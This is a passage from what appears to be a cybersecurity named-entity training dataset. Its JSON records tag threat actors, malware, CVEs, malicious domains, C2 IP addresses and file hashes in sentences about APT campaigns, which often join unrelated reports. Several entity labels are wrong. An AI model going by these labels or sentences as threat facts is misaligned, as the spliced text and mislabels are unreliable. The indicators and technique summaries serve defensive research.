We also found a live service selling VPS hosting at secure[.]66[.]to .", "spans": {"TOOL: Poison Ivy": [[149, 159]], "THREAT_ACTOR: attackers": [[179, 188]], "TOOL: HttpProv library": [[423, 439]], "ORGANIZATION: ESET": [[462, 466]], "THREAT_ACTOR: OceanLotus": [[482, 492]]}, "info": {"id": "cyberner_stix_train_002029", "source": "cyberner_stix_train"}} {"text": "TUESDAY , MAY 19 , 2020 The wolf is back ... NEWS SUMMARY Thai Android devices and users are being targeted by a modified version of DenDroid we are calling \" WolfRAT , '' now targeting messaging apps like WhatsApp , Facebook Messenger and Line . Perhaps it also points to the suspected North Korean origin of attack . APT12 . The problem is that CSP does n't support query strings ( See Spec ):", "spans": {"SYSTEM: Android": [[63, 70]], "MALWARE: DenDroid": [[133, 141]], "MALWARE: WolfRAT": [[159, 166]], "SYSTEM: WhatsApp": [[206, 214]], "SYSTEM: Facebook Messenger": [[217, 235]], "SYSTEM: Line": [[240, 244]], "THREAT_ACTOR: APT12": [[319, 324]], "SYSTEM: CSP": [[347, 350]]}, "info": {"id": "cyberner_stix_train_002030", "source": "cyberner_stix_train"}} {"text": "In some cases , it uses this mechanism to send log data of important actions . PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": {"THREAT_ACTOR: PLATINUM": [[79, 87]], "TOOL: custom tools": [[130, 142]], "ORGANIZATION: government office": [[314, 331]], "FILEPATH: Word documents": [[386, 400]]}, "info": {"id": "cyberner_stix_train_002031", "source": "cyberner_stix_train"}} {"text": "We have observed the Enfal malware in use since 2011 and in conjunction with Backdoor.APT.Pgift as the payload of a malicious document used in spearphishing attacks . 
MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot .", "spans": {"TOOL: Enfal malware": [[21, 34]], "MALWARE: Backdoor.APT.Pgift": [[77, 95]], "THREAT_ACTOR: MoneyTaker": [[167, 177]], "MALWARE: fileless": [[185, 193]]}, "info": {"id": "cyberner_stix_train_002032", "source": "cyberner_stix_train"}} {"text": "Typically , however , cybercriminals first test-run a technology on the Russian sector of the Internet and then roll it out globally , attacking users in other countries . The codename for Turla APT group in this presentation is MAKERSMARK . Winnti : CLR.exe . We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": {"THREAT_ACTOR: Turla APT group": [[189, 204]], "THREAT_ACTOR: Winnti": [[242, 248]], "FILEPATH: CLR.exe": [[251, 258]], "ORGANIZATION: cyber range": [[330, 341]], "ORGANIZATION: Rostelecom - Solar": [[371, 389]], "ORGANIZATION: Russian cyber security company": [[394, 424]]}, "info": {"id": "cyberner_stix_train_002033", "source": "cyberner_stix_train"}} {"text": "Key information consists of an MD5 hash of the device 's Android ID , the device manufacturer , and the device model with each separated by an underscore . In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM . globalowa.com gmailboxes.com hugesoft.org idirectech.com ifexcel.com infosupports.com livemymsn.com mcafeepaying.com microsoft-update-info.com micyuisyahooapis.com msnhome.org pcclubddk.net progammerli.com softsolutionbox.net symanteconline.net webservicesupdate.com . 
We took google - analytics as an example , but other services can also be used .", "spans": {"SYSTEM: Android": [[57, 64]], "ORGANIZATION: security firm": [[184, 197]], "ORGANIZATION: Resecurity": [[198, 208]], "DOMAIN: globalowa.com": [[355, 368]], "DOMAIN: gmailboxes.com": [[369, 383]], "DOMAIN: hugesoft.org": [[384, 396]], "DOMAIN: idirectech.com": [[397, 411]], "DOMAIN: ifexcel.com": [[412, 423]], "DOMAIN: infosupports.com": [[424, 440]], "DOMAIN: livemymsn.com": [[441, 454]], "DOMAIN: mcafeepaying.com": [[455, 471]], "DOMAIN: microsoft-update-info.com": [[472, 497]], "DOMAIN: micyuisyahooapis.com": [[498, 518]], "DOMAIN: msnhome.org": [[519, 530]], "DOMAIN: pcclubddk.net": [[531, 544]], "DOMAIN: progammerli.com": [[545, 560]], "DOMAIN: softsolutionbox.net": [[561, 580]], "DOMAIN: symanteconline.net": [[581, 599]], "DOMAIN: webservicesupdate.com": [[600, 621]], "SYSTEM: google - analytics": [[632, 650]]}, "info": {"id": "cyberner_stix_train_002034", "source": "cyberner_stix_train"}} {"text": "Network Security appliances such as Next-Generation Firewall ( NGFW ) , Next-Generation Intrusion Prevention System ( NGIPS ) , and Meraki MX can detect malicious activity associated with this threat . The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 .", "spans": {"SYSTEM: Next-Generation Firewall ( NGFW )": [[36, 69]], "SYSTEM: Next-Generation Intrusion Prevention System ( NGIPS )": [[72, 125]], "SYSTEM: Meraki MX": [[132, 141]], "MALWARE: GoogleUpdate.exe": [[206, 222]], "THREAT_ACTOR: TEMP.Hermit": [[341, 352]], "MALWARE: MACKTRUCK": [[363, 372]], "THREAT_ACTOR: APT38": [[399, 404]], "ORGANIZATION: bank": [[429, 433]]}, "info": {"id": "cyberner_stix_train_002035", "source": "cyberner_stix_train"}} {"text": "] nampriknum [ . 
These versions of KeyBoy differed from the one first described by Rapid7 in several ways , many of which will be described in the sections to follow . Naturally , our first priority is ensuring that we detect the new or altered TTPs . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": {"TOOL: KeyBoy": [[35, 41]], "ORGANIZATION: Rapid7": [[83, 89]], "MALWARE: NetSupport RAT": [[290, 304]]}, "info": {"id": "cyberner_stix_train_002036", "source": "cyberner_stix_train"}} {"text": "Information about the C & C domain used by the Ashas adware Knowing that the information provided to a domain registrar might be fake , we continued our search . To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe utility to register a custom shim database file containing a patch onto a system . File type: JPEG image data , JFIF standard 1.02 .", "spans": {"MALWARE: Ashas": [[47, 52]], "THREAT_ACTOR: FIN7": [[228, 232]], "TOOL: PowerShell script": [[262, 279]], "MALWARE: sdbinst.exe": [[296, 307]]}, "info": {"id": "cyberner_stix_train_002037", "source": "cyberner_stix_train"}} {"text": "Our analysis indicates that the threat actors are no longer limiting their campaigns to East Asian countries , but are targeting additional countries around the world . Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors . 
Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights .", "spans": {"THREAT_ACTOR: APT33": [[206, 211]], "ORGANIZATION: Security Analyst Summit": [[461, 484]], "ORGANIZATION: SAS": [[487, 490]], "ORGANIZATION: Kaspersky Lab": [[500, 513]], "ORGANIZATION: bank": [[580, 584]], "THREAT_ACTOR: Metel": [[597, 602]], "THREAT_ACTOR: GCMAN": [[607, 612]], "THREAT_ACTOR: Carbanak group": [[642, 656]]}, "info": {"id": "cyberner_stix_train_002038", "source": "cyberner_stix_train"}} {"text": "When we published that blog Unit 42 hadn ’ t seen any of the three registrants overlap domains used in malicious activity . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 .", "spans": {"THREAT_ACTOR: APT33": [[436, 441]]}, "info": {"id": "cyberner_stix_train_002039", "source": "cyberner_stix_train"}} {"text": "The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past . In other cases , threat actors placed web shells on externally accessible servers , sometimes behind a reverse proxy , to execute commands on the compromised system .", "spans": {"TOOL: legitimate Thai websites": [[30, 54]], "MALWARE: web shells": [[167, 177]]}, "info": {"id": "cyberner_stix_train_002040", "source": "cyberner_stix_train"}} {"text": "A motivated attacker can use this trojan to harvest usernames and passwords and then reuse them to login into the organization 's system where the victim works . 
APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 . OceanLotus : e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e Loader #2 . The Budworm advanced persistent threat APT group continues to actively develop its toolset .", "spans": {"THREAT_ACTOR: APT10": [[162, 167], [382, 387]], "TOOL: Poison Ivy malware family": [[190, 215]], "ORGANIZATION: FireEye": [[229, 236]], "THREAT_ACTOR: threat actors": [[356, 369]], "THREAT_ACTOR: OceanLotus": [[390, 400]], "FILEPATH: e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e": [[403, 467]], "THREAT_ACTOR: The Budworm advanced persistent threat APT group": [[480, 528]], "TOOL: toolset": [[563, 570]]}, "info": {"id": "cyberner_stix_train_002041", "source": "cyberner_stix_train"}} {"text": "Since this tool allows an attacker to sniff passwords from network traffic , it could have been used on the hotel Wi-Fi network to obtain a user ’s credentials .", "spans": {"TOOL: network traffic": [[59, 74]], "TOOL: Wi-Fi network": [[114, 127]]}, "info": {"id": "cyberner_stix_train_002042", "source": "cyberner_stix_train"}} {"text": "In addition to this file , the sample also contacted 104.238.184.252 for the PowerShell executable .", "spans": {"IP_ADDRESS: 104.238.184.252": [[53, 68]], "TOOL: PowerShell": [[77, 87]]}, "info": {"id": "cyberner_stix_train_002043", "source": "cyberner_stix_train"}} {"text": "This means that the authors or the operators can add capabilities without the need to recompile and upgrade the trojan package on the device . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . 
APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea .", "spans": {"MALWARE: China Chopper": [[147, 160]], "VULNERABILITY: CVE-2015-0062": [[289, 302]], "VULNERABILITY: CVE-2015-1701": [[305, 318]], "VULNERABILITY: CVE-2016-0099": [[323, 336]], "THREAT_ACTOR: attacker": [[350, 358]], "THREAT_ACTOR: APT37": [[399, 404]], "MALWARE: SLOWDRIFT": [[417, 426]], "MALWARE: malware": [[427, 434]], "ORGANIZATION: academic": [[491, 499]], "ORGANIZATION: strategic institutions": [[504, 526]]}, "info": {"id": "cyberner_stix_train_002044", "source": "cyberner_stix_train"}} {"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack .", "spans": {"TOOL: ActiveX control": [[46, 61]], "MALWARE: JavaScript file": [[76, 91]], "VULNERABILITY: CVE-2013-7331": [[203, 216]], "THREAT_ACTOR: Spring Dragon group": [[297, 316]], "VULNERABILITY: exploits": [[354, 362]]}, "info": {"id": "cyberner_stix_train_002045", "source": "cyberner_stix_train"}} {"text": "After libmsy.so decrypts the asset file tong.luo , it loads mycode.jar dynamically into FakeSpy ’ s process , as is shown from the output of the “ adb logcat ” command . Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . 
This key was also used in the Honeybee campaign and appears to have been used since August 2017 .", "spans": {"MALWARE: FakeSpy": [[88, 95]], "THREAT_ACTOR: threat actors": [[261, 274]]}, "info": {"id": "cyberner_stix_train_002046", "source": "cyberner_stix_train"}} {"text": "This addition is seen in Figure 5 . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . The controller will respond with one of two responses: 99.250.250.199 will set the receive mode to . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": {"ORGANIZATION: The New York Times": [[60, 78]], "THREAT_ACTOR: APT12": [[121, 126]], "TOOL: Backdoor.APT.Aumlib": [[183, 202]], "TOOL: Backdoor.APT.Ixeshe malware families": [[207, 243]], "IP_ADDRESS: 99.250.250.199": [[301, 315]], "ORGANIZATION: Bulgaria": [[468, 476]], "ORGANIZATION: China": [[479, 484]], "ORGANIZATION: Vietnam": [[487, 494]]}, "info": {"id": "cyberner_stix_train_002047", "source": "cyberner_stix_train"}} {"text": "It remains unclear whether these are leftover code from the previous versions or their particular purposes were served .", "spans": {}, "info": {"id": "cyberner_stix_train_002048", "source": "cyberner_stix_train"}} {"text": "ViperRAT takes this one step further by using its dropper app to identify an appropriate second stage ‘ update ’ that may go unnoticed . To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments . If the service fails to start then a random service name formatted as netsvc_xxxxxxxx , where xxxxxxxx represent an 8-digit random hex value , is added to the netsvc group and the entire function is repeated . 
TIEDYE ( xpc.protect )", "spans": {"MALWARE: ViperRAT": [[0, 8]], "TOOL: PDF attachments": [[279, 294]], "TOOL: netsvc": [[456, 462]], "MALWARE: TIEDYE ( xpc.protect )": [[507, 529]]}, "info": {"id": "cyberner_stix_train_002049", "source": "cyberner_stix_train"}} {"text": "For example the actor changed the XOR key and the MUTEX name .", "spans": {}, "info": {"id": "cyberner_stix_train_002050", "source": "cyberner_stix_train"}} {"text": "The .NET variant creates “ 1FABFBFF0000065132F71D94 ” , while the native version creates “ 000206511FABFBFF ” .", "spans": {"TOOL: .NET": [[4, 8]], "FILEPATH: 1FABFBFF0000065132F71D94": [[27, 51]], "FILEPATH: 000206511FABFBFF": [[91, 107]]}, "info": {"id": "cyberner_stix_train_002051", "source": "cyberner_stix_train"}} {"text": "It also will gather email addresses scraped from files stored on the computer .", "spans": {"TOOL: email": [[20, 25]]}, "info": {"id": "cyberner_stix_train_002052", "source": "cyberner_stix_train"}} {"text": "It is important to note that the activity conducted by the malware is not borderline advertising , but definitely an illegitimate use of the users ’ mobile devices for generating fraudulent clicks , benefiting the attackers . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly . It is noteworthy that this function includes the code to set the ZxShell node as a server : if one of the hardcoded boolean value is set to 1, a listening socket is created . 
After analyzing code from a command and control ( C2 ) server used in the global cyber - espionage campaign dubbed ' Sharpshooter ' , security researchers found more evidence linking it to North Korea 's Lazarus threat actor .", "spans": {"ORGANIZATION: DHS": [[246, 249]], "ORGANIZATION: Symantec": [[336, 344]], "MALWARE: ZxShell": [[428, 435]], "SYSTEM: command and control ( C2 ) server": [[566, 599]], "ORGANIZATION: security researchers": [[672, 692]], "THREAT_ACTOR: North Korea 's Lazarus": [[727, 749]]}, "info": {"id": "cyberner_stix_train_002053", "source": "cyberner_stix_train"}} {"text": "Examples include CozyDuke infecting its victims with SeaDuke , HammerDuke ,or OnionDuke ; and CosmicDuke infecting its victims with PinchDuke ,GeminiDuke or MiniDuke .", "spans": {"MALWARE: CozyDuke": [[17, 25]], "MALWARE: SeaDuke": [[53, 60]], "MALWARE: HammerDuke": [[63, 73]], "MALWARE: OnionDuke": [[78, 87]], "MALWARE: CosmicDuke": [[94, 104]], "MALWARE: PinchDuke": [[132, 141]], "MALWARE: ,GeminiDuke": [[142, 153]], "MALWARE: MiniDuke": [[157, 165]]}, "info": {"id": "cyberner_stix_train_002054", "source": "cyberner_stix_train"}} {"text": "APK files will not natively open in an environment other than an Android device . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . It used a multi-stage binary infection to update each module effectively and evade detection . 
We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": {"SYSTEM: Android": [[65, 72]], "VULNERABILITY: Flash exploits": [[93, 107]], "VULNERABILITY: Java zero-day": [[177, 190]], "ORGANIZATION: Kaspersky Lab": [[250, 263]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[276, 304]], "MALWARE: SocGholish": [[422, 432]]}, "info": {"id": "cyberner_stix_train_002055", "source": "cyberner_stix_train"}} {"text": ". Despite some exceptions , the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments . Pierogi , the backdoor in this attack , appears to be a new backdoor written in Delphi . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"TOOL: IP": [[70, 72]], "MALWARE: Pierogi": [[187, 194]], "MALWARE: backdoor": [[201, 209]], "TOOL: backdoor": [[247, 255]], "TOOL: Delphi": [[267, 273]], "ORGANIZATION: Microsoft": [[361, 370]]}, "info": {"id": "cyberner_stix_train_002056", "source": "cyberner_stix_train"}} {"text": "Now that specific Babar samples have been identified and analyzed , there might be new information , also with regards to similarities or differences between the two Remote Administration Tools ( RATs ) EvilBunny and Babar . 
The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME .", "spans": {"TOOL: Babar samples": [[18, 31]], "TOOL: Remote Administration Tools": [[166, 193]], "TOOL: RATs": [[196, 200]], "TOOL: EvilBunny": [[203, 212]], "TOOL: Babar": [[217, 222]], "FILEPATH: st07383.en17.docx": [[237, 254]], "VULNERABILITY: CVE-2017-0001": [[305, 318]], "FILEPATH: SHIRIME": [[424, 431]]}, "info": {"id": "cyberner_stix_train_002057", "source": "cyberner_stix_train"}} {"text": "It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions are met : The MD5 hash of the parent process image name is either D0C4DBFA1F3962AED583F6FCE666F8BC or 3CE30F5FED4C67053379518EACFCF879 The parent process ’ s full image path is equal to its own process path If these initial checks are passed , the loader builds a complete IAT by reading four imported libraries from disk ( ntdll.dll We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on . Winnti : T1043 Commonly Used Port ( 80 , 443 ) . Users were drawn to a login prompt that was designed to harvest user credentials with pages that looked like Adobe , Microsoft , etc .", "spans": {"TOOL: IRC bot": [[471, 478]], "TOOL: MPK": [[486, 489]], "TOOL: Leash sample": [[533, 545]], "THREAT_ACTOR: Winnti": [[562, 568]], "TOOL: Adobe": [[720, 725]], "TOOL: Microsoft": [[728, 737]]}, "info": {"id": "cyberner_stix_train_002058", "source": "cyberner_stix_train"}} {"text": "More recent variants blend rooting capabilities and click fraud . Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida . 
On December 1, 2015, threat actors launched two additional spear phishing attacks exploiting the undisclosed EPS vulnerability and CVE-2015-1701 . Furthermore , as system and web server logs may have time or size limits enforced , we recommend preserving the following artifacts for forensic analysis : • At least 14 days of HTTP web logs from the directories ( include logs from all subdirectories ) •", "spans": {"THREAT_ACTOR: MoneyTaker": [[84, 94]], "TOOL: EPS": [[347, 350]], "VULNERABILITY: CVE-2015-1701": [[369, 382]], "SYSTEM: system and web server logs": [[402, 428]]}, "info": {"id": "cyberner_stix_train_002059", "source": "cyberner_stix_train"}} {"text": "On infected PCs , TrickBot displays a query for the mobile phone number and the device type used for banking and then prompts users to install an alleged security app. ” When banking Trojans ask for this type of information , it usually means the next step will be an attempt to infect the victim ’ s mobile device . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 .", "spans": {"MALWARE: TrickBot": [[18, 26]], "THREAT_ACTOR: BalkanDoor": [[351, 361]], "VULNERABILITY: CVE-2018-20250": [[451, 465]], "ORGANIZATION: FireEye 's Mandiant": [[493, 512]], "ORGANIZATION: FireEye iSIGHT Threat Intelligence": [[557, 591]]}, "info": {"id": "cyberner_stix_train_002060", "source": "cyberner_stix_train"}} {"text": "large manufacturing companies , particularly those supplying defense organizations , energy companies , embassies in Washington , DC representing countries in the Middle East , Europe , and Asia , likely to target U.S. 
based users involved in international relations , non-governmental organizations ( NGOs ) , particularly those focused on international relations and defense , government organizations .", "spans": {"ORGANIZATION: DC": [[130, 132]]}, "info": {"id": "cyberner_stix_train_002061", "source": "cyberner_stix_train"}} {"text": "The threat actor had a specific pattern of behavior that allowed us to understand their modus operandi : they used one server with the same IP address for multiple operations . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16]], "ORGANIZATION: civil society": [[246, 259]], "ORGANIZATION: human rights organizations": [[264, 290]], "ORGANIZATION: diaspora": [[420, 428]]}, "info": {"id": "cyberner_stix_train_002062", "source": "cyberner_stix_train"}} {"text": "APT28 Targets Hospitality Sector , Presents Threat to Travelers .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_002063", "source": "cyberner_stix_train"}} {"text": "Based on our KSN statistics , there are several infected individuals , exclusively in Italy . This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities . 
The group has conducted intrusions to steal money via targeting ATM systems , card processing , payment systems and SWIFT systems .", "spans": {"THREAT_ACTOR: MuddyWater": [[139, 149]], "TOOL: ATM systems": [[299, 310]], "TOOL: payment systems": [[331, 346]], "TOOL: SWIFT systems": [[351, 364]]}, "info": {"id": "cyberner_stix_train_002064", "source": "cyberner_stix_train"}} {"text": "The following screenshot shows the contacts being stolen and written in a local array , which is then sent to C & C : Uninstalling apps Uninstalling apps is another function favored by developers of Android spyware and malware . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . This isn't the first time we've seen Cobalt makes this error—back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw .", "spans": {"SYSTEM: Android": [[199, 206]], "THREAT_ACTOR: Silence": [[229, 236]], "THREAT_ACTOR: Cobalt": [[513, 519]], "ORGANIZATION: financial institutions": [[597, 619]]}, "info": {"id": "cyberner_stix_train_002065", "source": "cyberner_stix_train"}} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . 
Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "MALWARE: Metasploit": [[270, 280]]}, "info": {"id": "cyberner_stix_train_002066", "source": "cyberner_stix_train"}} {"text": "Using RDP and stolen credentials from the initially compromised host , the threat actor then proceeded to move laterally around the victim network and was able to deploy GandCrab across several other hosts . In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters .", "spans": {"TOOL: RDP": [[6, 9]], "TOOL: GandCrab": [[170, 178]]}, "info": {"id": "cyberner_stix_train_002067", "source": "cyberner_stix_train"}} {"text": "As soon as the user clicks the spyware ’ s icon for the first time , nothing seems to happen and the icon disappears from the home screen . Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe . Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 .", "spans": {"THREAT_ACTOR: Silence": [[171, 178]], "ORGANIZATION: banks": [[228, 233]], "THREAT_ACTOR: Charming Kitten": [[290, 305]]}, "info": {"id": "cyberner_stix_train_002068", "source": "cyberner_stix_train"}} {"text": "Just like in previous examples , the malware author does not use this package . These threats are capable of opening a back door and stealing information from victims' computers . From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE , a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control ( C2 ) server . 
GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic , 9002 for C2 requests , 33666 as a WebSocket , and 8090 to download files.[15 ] GravityRAT has used HTTP over a non - standard port , such as TCP port 46769.[16 ] HARDRAIN binds and listens on port 443 with a FakeTLS method.[17 ] HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method.[18 ] Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic , creating port - protocol mismatches.[19][20 ] MacMa has used TCP port 5633 for C2 Communication.[21 ]", "spans": {"ORGANIZATION: FireEye": [[211, 218]], "THREAT_ACTOR: APT12": [[228, 233]], "MALWARE: RIPTIDE": [[244, 251]], "TOOL: command and control": [[320, 339]], "TOOL: C2": [[342, 344]], "MALWARE: GoldenSpy": [[356, 365]], "MALWARE: GravityRAT": [[506, 516]], "MALWARE: HARDRAIN": [[589, 597]], "MALWARE: HOPLIGHT": [[656, 664]], "MALWARE: Lazarus Group malware": [[739, 760]], "MALWARE: MacMa": [[877, 882]], "SYSTEM: C2 Communication.[21": [[910, 930]]}, "info": {"id": "cyberner_stix_train_002069", "source": "cyberner_stix_train"}} {"text": "July 16 On the mobile front , a fake news app designed to bypass Google Play was discovered . As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens . this did not work for functions with three or more dispatchers . 
However , not all insider threats are intentional , according to an Insider Threat Report from Crowd Research Partners .", "spans": {"SYSTEM: Google Play": [[65, 76]], "ORGANIZATION: Jerusalem Post": [[239, 253]], "ORGANIZATION: Palestinian Authority": [[322, 343]], "THREAT_ACTOR: CopyKittens": [[385, 396]], "ORGANIZATION: Crowd Research Partners": [[559, 582]]}, "info": {"id": "cyberner_stix_train_002070", "source": "cyberner_stix_train"}} {"text": "This is an area where virus writers are actively working , resulting in a large number of technological innovations . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups . In case hpqhvsei.dll is loaded by a different process than hpqhvind.exe , the malicious code will not be decrypted and executed . Indicators of Attack are different from Indicators of Compromise IoC , the latter describing evidence of compromised network security .", "spans": {"ORGANIZATION: defense contractors": [[180, 199]], "ORGANIZATION: colleges": [[202, 210]], "ORGANIZATION: universities": [[215, 227]], "ORGANIZATION: law firms": [[230, 239]], "ORGANIZATION: political organizations": [[246, 269]], "ORGANIZATION: minority ethnic groups": [[315, 337]], "FILEPATH: hpqhvsei.dll": [[348, 360]], "FILEPATH: hpqhvind.exe": [[399, 411]]}, "info": {"id": "cyberner_stix_train_002071", "source": "cyberner_stix_train"}} {"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON Furthermore , it has similar code logic as previous ones wuaupdt.exe in this 
attack appears in previous Donot attack , and C2 addresses are same to previous ones . Another time , the execution flow moves from “ exit.exe to “ i.cmd ” .", "spans": {"MALWARE: wuaupdt.exe": [[448, 459]], "FILEPATH: exit.exe": [[602, 610]], "FILEPATH: i.cmd": [[616, 621]]}, "info": {"id": "cyberner_stix_train_002072", "source": "cyberner_stix_train"}} {"text": "We hope that this writeup of our journey through all the multiple layers of protection , obfuscation , and anti-analysis techniques of FinFisher will be useful to other researchers studying this malware . They move laterally and escalate system privileges to extract sensitive information — whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult . The backdoor also contains an export that loads the C2 communication module reflectively to the memory from resource passed as parameter and then calls its \" CreateInstance \" export . The availability of such builders allows novice actors to generate their own customized ransomware variants .", "spans": {"MALWARE: FinFisher": [[135, 144]], "THREAT_ACTOR: attacker": [[304, 312]], "TOOL: RATs": [[346, 350]], "TOOL: C2": [[534, 536]], "TOOL: CreateInstance": [[640, 654]], "VULNERABILITY: The availability of such builders": [[666, 699]]}, "info": {"id": "cyberner_stix_train_002073", "source": "cyberner_stix_train"}} {"text": "traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . 
Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state .", "spans": {"ORGANIZATION: aerospace": [[27, 36]], "ORGANIZATION: energy": [[39, 45]], "ORGANIZATION: government": [[48, 58]], "ORGANIZATION: high-tech": [[61, 70]], "ORGANIZATION: consulting services": [[73, 92]], "ORGANIZATION: chemicals": [[99, 108]], "ORGANIZATION: manufacturing": [[111, 124]], "ORGANIZATION: mining sectors": [[127, 141]], "THREAT_ACTOR: Infy": [[353, 357]]}, "info": {"id": "cyberner_stix_train_002074", "source": "cyberner_stix_train"}} {"text": "As Unit 42 have observed throughout our tracking of the OilRig group , adopting proven tactics has been a common behavior over time . Based on our research , SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans . It is interesting to note that Turla operators used the free email provider GMX again , as in the Outlook Backdoor and in LightNeuron . This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion . Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 . Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose . In all likelihood , Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover . 
